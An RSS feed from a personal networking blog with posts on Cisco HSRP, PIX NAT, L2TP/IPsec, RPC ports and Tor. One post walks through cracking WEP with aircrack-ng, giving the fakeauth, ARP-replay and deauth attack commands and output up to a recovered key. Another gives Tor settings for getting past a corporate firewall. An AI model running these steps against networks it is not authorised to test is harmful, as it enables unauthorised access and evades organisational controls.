<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>the new cube 2.0 &#187; Network</title>
	<atom:link href="http://jiehong.org/blog/category/technical/network/feed/" rel="self" type="application/rss+xml" />
	<link>http://jiehong.org/blog</link>
	<description>the new cube 2.0</description>
	<lastBuildDate>Sat, 21 Jan 2012 17:43:20 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Check Point VPN-1 Support for iPhone</title>
		<link>http://jiehong.org/blog/2008/09/30/check-point-vpn-1-support-for-iphone/</link>
		<comments>http://jiehong.org/blog/2008/09/30/check-point-vpn-1-support-for-iphone/#comments</comments>
		<pubDate>Tue, 30 Sep 2008 04:58:33 +0000</pubDate>
		<dc:creator>jiehong</dc:creator>
				<category><![CDATA[Mobiles]]></category>
		<category><![CDATA[Network]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Technical]]></category>
		<category><![CDATA[Check Point]]></category>
		<category><![CDATA[iphone]]></category>
		<category><![CDATA[ipsec]]></category>
		<category><![CDATA[vpn]]></category>

		<guid isPermaLink="false">http://jiehong.org/blog/?p=186</guid>
		<description><![CDATA[Now, this is interesting for you iPhone folks. Check Point is providing IPsec VPN client for iPhone. Link]]></description>
			<content:encoded><![CDATA[<p>Now, this is interesting for you iPhone folks. Check Point is providing IPsec VPN client for iPhone.</p>
<p><a href="http://www.checkpoint.com/press/2008/iphone060208.html" target="_blank">Link</a></p>
]]></content:encoded>
			<wfw:commentRss>http://jiehong.org/blog/2008/09/30/check-point-vpn-1-support-for-iphone/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Yet another aircrack-ng guide</title>
		<link>http://jiehong.org/blog/2007/12/28/yet-another-aircrack-ng-guide/</link>
		<comments>http://jiehong.org/blog/2007/12/28/yet-another-aircrack-ng-guide/#comments</comments>
		<pubDate>Thu, 27 Dec 2007 18:25:01 +0000</pubDate>
		<dc:creator>jiehong</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Network]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Technical]]></category>
		<category><![CDATA[aircrack]]></category>
		<category><![CDATA[crack]]></category>
		<category><![CDATA[linksys]]></category>
		<category><![CDATA[wep]]></category>
		<category><![CDATA[wusb54gc]]></category>

		<guid isPermaLink="false">http://jiehong.org/blog/2007/12/28/yet-another-aircrack-ng-guide/</guid>
		<description><![CDATA[I managed to get hold of a Linksys WUSB54GC USB wireless-g adapter and a burnt copy of Backtrack 2 with Aircrack-ng. So let&#8217;s get started then..Back Track 2 loaded with the rt73 drivers. The following commands is to get your WUSB54GC dongle into the monitor/injection mode. &#8220;ifconfig rausb0 up&#8221; &#8220;iwconfig rausb0 mode monitor channel 1 [...]]]></description>
			<content:encoded><![CDATA[<p>I managed to get hold of a Linksys WUSB54GC USB wireless-g adapter and a burnt copy of Backtrack 2 with <a title="Aircrack-ng" href="http://www.aircrack-ng.org/" target="_blank">Aircrack-ng</a>.</p>
<p>So let&#8217;s get started then..Back Track 2 loaded with the rt73 drivers.</p>
<p>The following commands is to get your WUSB54GC dongle into the monitor/injection mode.</p>
<p>&#8220;ifconfig rausb0 up&#8221;</p>
<p>&#8220;iwconfig rausb0 mode monitor channel 1 rate 1M&#8221;</p>
<p>&#8220;iwpriv rausb0 forceprism 1&#8243;</p>
<p>&#8220;iwpriv rausb0 rfmontx 1&#8243;</p>
<p><span id="more-84"></span></p>
<p>I have yet to find out what those iwpriv does other than turning on some private IO controls within the card or drivers.</p>
<p>To verify that your card is ready for injecting, execute &#8220;aireplay-ng &#8211;test rausb0&#8243;</p>
<p>You should see the following:</p>
<p>Trying broadcast probe requests&#8230;<br />
Injection is working!<br />
Found 15 APs</p>
<p>Now we are ready, open the first console and execute the following command</p>
<p>&#8220;airodump-ng &#8211;ivs -w capture &#8211;encrypt wep -a rausb0&#8243;</p>
<p>and it  will return with a list of APs by BSSID, PWR, CH, ESSID and other interesting fields and data dumped to a capture-0x.ivs</p>
<p>Once you have determine your target, you may want to re-run airodump and filter by the BSSID or leave the command running to collect the IVs.</p>
<p>Next, we will execute a series of commands in different consoles together.</p>
<p>The fakeauth attack &#8220;aireplay-ng &#8211;fakeauth 10 -e MySSID -a 00:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 rausb0&#8243;</p>
<p>You should see the following:</p>
<p>Waiting for beacon frame (BSSID: 00:XX:XX:XX:XX:XX)<br />
Sending Authentication Request<br />
Authentication successful<br />
Sending Association Request<br />
Association successful <img src='http://jiehong.org/blog/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p>The ARP replay attack &#8220;aireplay-ng &#8211;arpreplay -e &lt;ESSID&gt; -b &lt;BSSID&gt; -h 00:11:22:33:44:55 rausb0&#8243;</p>
<p>You should see the following:</p>
<p>Saving ARP requests in replay_arp-xxxxx.cap<br />
You should also start airodump-ng to capture replies.<br />
Read 53965 packets (got 31064 ARP requests), sent 48076 packets&#8230;(319 pps)</p>
<p>Here&#8217;s the part where I don&#8217;t get it.</p>
<p>Sometimes you have to run a deauth attack to get some ARP packets coming, sometimes I don&#8217;t need to.</p>
<p>aireplay-ng &#8211;deauth 10 -e MySSID -a &lt;00:XX:XX:XX:XX:XX&gt; -h 00:11:22:33:44:55 rausb0</p>
<p>Finally after collecting about 100k for 64bit WEP till 500k for 128bit WEP of IV packets, you may execute &#8220;aircrack-ng -b 00:XX:XX:XX:XX:XX capture-0x.ivs&#8221;</p>
<p>You should see the following:</p>
<p>[00:00:00] Tested 1 keys (got 208713 IVs)</p>
<p>KB    depth   byte(vote)<br />
0    0/  1   XX(  XX) XX(  XX) XX(  XX) XX(  XX) XX(  XX) XX(  XX)</p>
<p>0    0/  2   XX(  XX) XX(  XX) XX(  XX) XX(  XX) XX(  XX) XX(  XX)</p>
<p>.</p>
<p>.</p>
<p>0    0/  5   XX(  XX) XX(  XX) XX(  XX) XX(  XX) XX(  XX) XX(  XX)</p>
<p>KEY FOUND! [ XX:XX:XX:XX:XX ]<br />
Decrypted correctly: 100%</p>
]]></content:encoded>
			<wfw:commentRss>http://jiehong.org/blog/2007/12/28/yet-another-aircrack-ng-guide/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>JanusVM &#8211; The Internet Privacy Appliance</title>
		<link>http://jiehong.org/blog/2007/10/08/janusvm-the-internet-privacy-appliance/</link>
		<comments>http://jiehong.org/blog/2007/10/08/janusvm-the-internet-privacy-appliance/#comments</comments>
		<pubDate>Mon, 08 Oct 2007 14:49:51 +0000</pubDate>
		<dc:creator>jiehong</dc:creator>
				<category><![CDATA[Firewall]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Network]]></category>
		<category><![CDATA[Technical]]></category>
		<category><![CDATA[janusvm]]></category>
		<category><![CDATA[privoxy]]></category>
		<category><![CDATA[tor]]></category>
		<category><![CDATA[vmware]]></category>

		<guid isPermaLink="false">http://www.jiehong.org/blog/2007/10/08/janusvm-the-internet-privacy-appliance/</guid>
		<description><![CDATA[I was trying out JanusVM in my VMware server. It&#8217;s a linux based OS with this few key components, openVPN, Squid, privoxy and Tor, packaged neatly into a VMware &#8220;appliance&#8221;. Basically it provides a layer of security and privacy for most TCP based applications, like IM, web browsing, etc, even DNS requests are passed through [...]]]></description>
			<content:encoded><![CDATA[<p>I was trying out <a href="http://janusvm.peertech.org/" target="_blank">JanusVM</a> in my VMware server.  It&#8217;s a linux based OS with this few key components, <a href="http://openvpn.net/" target="_blank">openVPN</a>, <a href="http://www.squid-cache.org/" target="_blank">Squid</a>, <a href="http://www.privoxy.org/" target="_blank">privoxy</a> and <a href="http://tor.eff.org/">Tor</a>, packaged neatly into a VMware &#8220;appliance&#8221;.</p>
<p>Basically it provides a layer of security and privacy for most TCP based applications, like IM, web browsing, etc, even DNS requests are passed through Tor. Most importantly, it provides you with access to sites that are filtered off by your ISP transparent proxies.</p>
<p><span id="more-80"></span></p>
<p><a href="http://tor.eff.org/" target="_blank">Tor</a> allows your traffic to be re-route all around the internet anonymously via a complex network of virtual tunnels. An overview of Tor can be found <a href="http://tor.eff.org/overview.html.en" target="_blank">here</a> and a detailed FAQ on Onion Routers <a href="http://wiki.noreply.org/noreply/TheOnionRouter/TorFAQ" target="_blank">here</a>.</p>
<p>My blog entry today is: how to enable your JanusVM to work in a corporate network whereby your firewall blocks most of the outgoing ports except http and https.</p>
<p>You can tell Tor to only use the ports that your firewall permits by adding the following to your torrc configuration file.</p>
<blockquote><p>FascistFirewall 1</p>
<p>ReachableDirAddresses *:80<br />
ReachableORAddresses *:443</p></blockquote>
<p>Update:</p>
<p>The latest beta version of Tor uses the following instead of the above</p>
<p>ReachableAddresses *:80</p>
]]></content:encoded>
			<wfw:commentRss>http://jiehong.org/blog/2007/10/08/janusvm-the-internet-privacy-appliance/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>HSRP</title>
		<link>http://jiehong.org/blog/2005/12/19/hsrp/</link>
		<comments>http://jiehong.org/blog/2005/12/19/hsrp/#comments</comments>
		<pubDate>Sun, 18 Dec 2005 16:00:28 +0000</pubDate>
		<dc:creator>jiehong</dc:creator>
				<category><![CDATA[Network]]></category>
		<category><![CDATA[Technical]]></category>

		<guid isPermaLink="false">http://jiehong.org/blog/2005/12/19/hsrp/</guid>
		<description><![CDATA[Having a &#8220;small&#8221; problem with HSRP. ASCII Network Diagram [switch-a1]--[router-a1]--[ISP 1 Cloud]--[router-b1]--[switch-b1]--- Active Link &#124; &#124; &#124; &#124; [switch-a2]--[router-a2]--[ISP 1 Cloud]--[router-b1]--[switch-b2]--- Standby Link I configured HSRP all on devices. My problem is, when a switch-a1 fails, router-a1 fails over to router-a2. but router-b1 will not fail over as the link between router-a1 and router-b1 via [...]]]></description>
			<content:encoded><![CDATA[<p>Having a &#8220;small&#8221; problem with HSRP.</p>
<p>ASCII Network Diagram</p>
<pre><small><small>[switch-a1]--[router-a1]--[ISP 1 Cloud]--[router-b1]--[switch-b1]--- Active Link
|          |                           |              |
[switch-a2]--[router-a2]--[ISP 1 Cloud]--[router-b1]--[switch-b2]--- Standby Link</small></small></pre>
<p>I configured HSRP all on devices. My problem is, when a switch-a1 fails, router-a1 fails over to router-a2. but router-b1 will not fail over as the link between router-a1 and router-b1 via ISP 1 is still up.</p>
<p>I tried HSRP tracking, but the best tracking method I found is IP Route Reachability.<br />
Track shows the object is up if the gateway to that network is still in your routing table.</p>
<p>so even configuring &#8220;track 100 ip route 10.2.2.2/32 reachability&#8221; doesn&#8217;t work, as the gateway is added manually as a static route.</p>
<p>Sample Config from Cisco.</p>
<p><span id="more-13"></span></p>
<pre><small>!Router A Configuration
track 100 ip route 10.2.2.0/24 reachability
!
interface Ethernet0/0
ip address 10.1.1.21 255.255.255.0
standby 1 preempt
standby 1 ip 10.1.1.1
standby 1 priority 110
standby 1 track 100 decrement 10</small></pre>
<p>Maybe HSRP is not that right solution for this deployment. 4 pairs of HSRP-ed devices connected.<br />
Solution:</p>
<p>Well, my teammates manage to solve this problem. Apparently HSRP not just track the interface but objects like route reachability and others.</p>
<p>The route reachability somehow didn&#8217;t work as determines the object is up if the gateway to that network is still in your routing table, so even the link is down. As we are using static route, its still in the routing table.</p>
<p>We discovered IP SLA, but it&#8217;s for IOS 12.4, and our image is still 12.3. The old commands is rtr, Response Time Reporter. In short we use ICMP Echos from a router to another switch to see whether that tracked objects is up or not.</p>
<p>So by configuring that RTR, the router-a will check with the switch-b and vice vesa to see whether the link is up or not. Of coz, there will be a lot of small packets generated every few sec. No other choice.</p>
]]></content:encoded>
			<wfw:commentRss>http://jiehong.org/blog/2005/12/19/hsrp/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>RPC Dynamic Ports</title>
		<link>http://jiehong.org/blog/2005/12/14/rpc-dynamic-ports/</link>
		<comments>http://jiehong.org/blog/2005/12/14/rpc-dynamic-ports/#comments</comments>
		<pubDate>Tue, 13 Dec 2005 16:00:28 +0000</pubDate>
		<dc:creator>jiehong</dc:creator>
				<category><![CDATA[Network]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Systems]]></category>
		<category><![CDATA[Technical]]></category>

		<guid isPermaLink="false">http://jiehong.org/blog/2005/12/14/rpc-dynamic-ports/</guid>
		<description><![CDATA[By default, Microsoft RPC allocate ports from 1024 &#8211; 65535. To restrict them to 5000 &#8211; 5100, Use the Registry entries below. &#8211; cut here &#8211; Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Internet] &#8220;Ports&#8221;=hex(7):35,00,30,00,30,00,30,00,2d,00,35,00,31,00,30,00,30,00,00,00,00, 00 &#8220;PortsInternetAvailable&#8221;=&#8221;Y&#8221; &#8220;UseInternetPorts&#8221;=&#8221;Y&#8221; &#8211; cut here]]></description>
			<content:encoded><![CDATA[<p>By default, Microsoft RPC allocate ports from 1024 &#8211; 65535.</p>
<p>To restrict them to 5000 &#8211; 5100, Use the Registry entries below.</p>
<p>&#8211; cut here &#8211;<br />
Windows Registry Editor Version 5.00</p>
<p>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Internet]<br />
&#8220;Ports&#8221;=hex(7):35,00,30,00,30,00,30,00,2d,00,35,00,31,00,30,00,30,00,00,00,00,  00<br />
&#8220;PortsInternetAvailable&#8221;=&#8221;Y&#8221;<br />
&#8220;UseInternetPorts&#8221;=&#8221;Y&#8221;</p>
<p>&#8211; cut here</p>
]]></content:encoded>
			<wfw:commentRss>http://jiehong.org/blog/2005/12/14/rpc-dynamic-ports/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PIX 7.0 VPN users accessing DMZ Servers with IP Static NAT to Inside</title>
		<link>http://jiehong.org/blog/2005/10/14/pix-70-vpn-users-accessing-dmz-servers-with-ip-static-nat-to-inside/</link>
		<comments>http://jiehong.org/blog/2005/10/14/pix-70-vpn-users-accessing-dmz-servers-with-ip-static-nat-to-inside/#comments</comments>
		<pubDate>Fri, 14 Oct 2005 01:50:14 +0000</pubDate>
		<dc:creator>jiehong</dc:creator>
				<category><![CDATA[Firewall]]></category>
		<category><![CDATA[Network]]></category>
		<category><![CDATA[Technical]]></category>

		<guid isPermaLink="false">http://jiehong.org/blog/2005/10/14/pix-70-vpn-users-accessing-dmz-servers-with-ip-static-nat-to-inside/</guid>
		<description><![CDATA[Another issue I have with Cisco PIX 7.0. I have a server connecting to the PIX DMZ interface with the IP of 172.17.1.1. This server is translated to an Inside IP 10.1.1.1 and to an Outside internet routable IP. When VPN users connect from outside, they want to access the DMZ server via the 10.1.1.1 [...]]]></description>
			<content:encoded><![CDATA[<p>Another issue I have with Cisco PIX 7.0.</p>
<p>I have a server connecting to the PIX DMZ interface with the IP of 172.17.1.1. This server is translated to an Inside IP 10.1.1.1 and to an Outside internet routable IP.</p>
<p>When VPN users connect from outside, they want to access the DMZ server via the 10.1.1.1 IP not the 172 IP.</p>
<p>They are able to connect to any host on the inside but unable to connect to the translated IP.</p>
<p>This is the static statement.<br />
static (dmz,inside) 10.1.1.1 172.17.1.1 netmask 255.255.255.255</p>
<p>My Networks<br />
Inside : 10.1.1.0/24<br />
DMZ : 172.17.1.0/24<br />
VPN Pool : 192.168.0.0/24</p>
<p>I posted this question at <a href="http://forums.cisco.com/eforum/servlet/NetProf?page=netprof&#038;forum=Security&#038;topic=Firewalling&#038;CommCmd=MB%3Fcmd%3Ddisplay_location%26location%3D.1dd96104">Cisco NetPro forum</a>, and I got this reply,</p>
<p><span id="more-7"></span></p>
<p>&#8220;static (dmz,inside) 10.1.1.1 172.17.1.1 netmask 255.255.255.255</p>
<p>as the command sugguested, the translation is between the dmz and the inside interfaces. it only works when the packet originated from the inside, not the vpn clinet from the outside.&#8221;</p>
<p>So I concluded that the VPN clients are connecting from the outside interface and the static command i used is only for host on the inside interface.</p>
<p>I still wondering is there a way of writing my ACL, traffic from outside to dmz have a different translation but I have already translated dmz to outside with another static command. So&#8230; help?</p>
]]></content:encoded>
			<wfw:commentRss>http://jiehong.org/blog/2005/10/14/pix-70-vpn-users-accessing-dmz-servers-with-ip-static-nat-to-inside/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>L2TP over IPsec</title>
		<link>http://jiehong.org/blog/2005/10/09/l2tp-over-ipsec/</link>
		<comments>http://jiehong.org/blog/2005/10/09/l2tp-over-ipsec/#comments</comments>
		<pubDate>Sat, 08 Oct 2005 16:00:14 +0000</pubDate>
		<dc:creator>jiehong</dc:creator>
				<category><![CDATA[Firewall]]></category>
		<category><![CDATA[Network]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Technical]]></category>

		<guid isPermaLink="false">http://jiehong.org/blog/2005/10/09/l2tp-over-ipsec/</guid>
		<description><![CDATA[Configuring L2TP over IPSec for both Cisco PIX and Cisco Router on the Customer side. Tricky things uncovered. According to the documentation provided on how the L2TP is to be configured: vpdn enable ! vpdn-group 1 accept-dialin protocol l2tp virtual-template 1 terminate-from hostname BB-GGSN1 local name CPE-L2TP-Router l2tp tunnel password 0 secret ! interface Virtual-Template1 [...]]]></description>
			<content:encoded><![CDATA[<p>Configuring L2TP over IPSec for both Cisco PIX and Cisco Router on the Customer side.</p>
<p>Tricky things uncovered.<br />
According to the documentation provided on how the L2TP is to be configured:</p>
<p>vpdn enable</p>
<p>!</p>
<p>vpdn-group 1<br />
accept-dialin<br />
protocol l2tp<br />
virtual-template 1<br />
terminate-from hostname BB-GGSN1<br />
local name CPE-L2TP-Router<br />
l2tp tunnel password 0 secret<br />
!</p>
<p>interface Virtual-Template1<br />
ip unnumbered FastEthernet0<br />
peer default ip address pool l2tp-pool01<br />
ppp authentication pap<br />
!</p>
<p>ip local pool l2tp-pool01 10.9.2.201 10.9.2.220</p>
<p>For the curious souls like me, how the hell the router knows who&#8217;s BB-GGSN1.. so I added:</p>
<p><span id="more-5"></span></p>
<p>ip host BB-GGSN2 202.x.x.x2<br />
ip host BB-GGSN1 202.x.x.x1</p>
<p>So the router is done but I still wondering, who&#8217;s going to auth all PAP request ?</p>
<p>PIX as follows:</p>
<p>access-list 90 permit ip host 203.x.x.x host 202.x.x.x6<br />
nat (inside) 0 access-list 90<br />
sysopt connection permit-ipsec<br />
sysopt connection permit-l2tp<br />
crypto ipsec transform-set transformset-strong esp-3des esp-sha-hmac<br />
crypto ipsec transform-set transformset-strong mode transport<br />
crypto dynamic-map dyna 20 match address 90<br />
crypto dynamic-map dyna 20 set transform-set transformset-strong<br />
crypto map site-map 10 ipsec-isakmp dynamic dyna<br />
crypto map site-map interface outside<br />
isakmp enable outside<br />
isakmp key ******** address 202.x.x.x6 netmask 255.255.255.255<br />
isakmp identity address<br />
isakmp policy 10 authentication pre-share<br />
isakmp policy 10 encryption 3des<br />
isakmp policy 10 hash sha<br />
isakmp policy 10 group 2<br />
isakmp policy 10 lifetime 86400</p>
<p>The tunnel just don&#8217;t get up.</p>
<p>I did a debug.<br />
debug crypto ipsec<br />
debug crypto isakmp</p>
<p>The debug shows proxy identities mis-matched, the error code is IKMP_ERR_NO_RETRANS<br />
I poke around with the error and change my access-list address. So I realised I had a typo and it causes the SA negotiation to fail.</p>
<p>access-list 90 permit ip host 203.X.X.X host 202.X.X.X1<br />
access-list 90 permit ip host 203.X.X.X host 202.X.X.X2</p>
<p>This ACL not only tells what traffic needed to be protected by IPSec but somehow it identify the peers on both side of the tunnel&#8217;s end point. I have to read up on this as this is kind of new to me. Usually site to site configuration always have both network address for the ACL.</p>
<p>So far, the tunnel seems to be up. I have yet to test the VPN tunnels as the user can&#8217;t seems to access the provider&#8217;s network at this moment.</p>
<p>Both the show statement shows positive results.<br />
show crypto ipsec sa<br />
show crypto isakmp sa</p>
<p>I&#8217;m still curious, I didn&#8217;t configured any radius server to auth the PAP users.</p>
<p>This is my first post for documentation.<br />
Lengthy.</p>
<p>Useful Links<br />
<a href="http://www.cisco.com/warp/public/cc/pd/iosw/tech/l2pro_tc.htm">Cisco Explaination on L2TP</a></p>
<p><a href="http://www.cisco.com/en/US/tech/tk583/tk372/technologies_configuration_example09186a00800ef796.shtml">Cisco Guide to Configuring Site to Site IPSec for PIX</a></p>
]]></content:encoded>
			<wfw:commentRss>http://jiehong.org/blog/2005/10/09/l2tp-over-ipsec/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

